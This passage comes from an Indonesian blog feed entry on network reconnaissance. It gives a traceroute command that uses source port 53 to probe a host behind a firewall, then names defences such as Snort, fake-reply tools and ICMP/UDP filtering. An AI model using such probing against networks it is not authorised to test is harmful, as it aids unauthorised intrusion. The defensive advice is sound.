port tertentu, misalnya port 53 yang merupakan port Domain Name System (DNS) menggunakan perintah:&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=""&gt;            &lt;/span&gt;# traceroute –s –P53 IP_mesin_tujuan_dibalik_firewall&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;Bagi para administrator jaringan, tentunya akan sangat menyakitkan jika mengetahui bahwa jaringan-nya di intai oleh para hacker menggunakan traceroute. Ada beberapa software yang dapat digunakan untuk menipu / membatasi proses pengintaian tersebut, seperti snort (&lt;a href="http://www.snort.org/"&gt;http://www.snort.org&lt;/a&gt;) yang merupakan software untuk melakukan Network Intrusion Detection System (NIDS). Kalau mau lebih jail lagi mungkin bisa menggunakan RotoRouter (&lt;a href="http://packetstorm.securify.com/linux/trinux/src/rr-1.0.tgz"&gt;http://packetstorm.securify.com/linux/trinux/src/rr-1.0.tgz&lt;/a&gt;) yang dapat mengirimkan responds palsu terhadap program yang melakukan tracreroute. Selain itu, anda juga dapat membatasi router-router yang ada di luar jaringan untuk membatasi traffik ICMP &amp;amp; UDP ke sistem yang spesifik, yang akhirnya akan mengurangi keterbukaan jaringan anda ke luar.&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/283880325471720442-5141059392154237939?l=gusriandy.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://gusriandy.blogspot.com/feeds/5141059392154237939/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=283880325471720442&amp;postID=5141059392154237939' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/283880325471720442/posts/default/5141059392154237939'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/283880325471720442/posts/default/5141059392154237939'/><link rel='alternate' type='text/html' href='http://gusriandy.blogspot.com/2007/11/secret-hacker.html' title='Teknik Mengintai Jaringan Lawan'/><author><name>Ndhy_Note Site's</name><uri>http://www.blogger.com/profile/12984169970942636271</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry></feed>
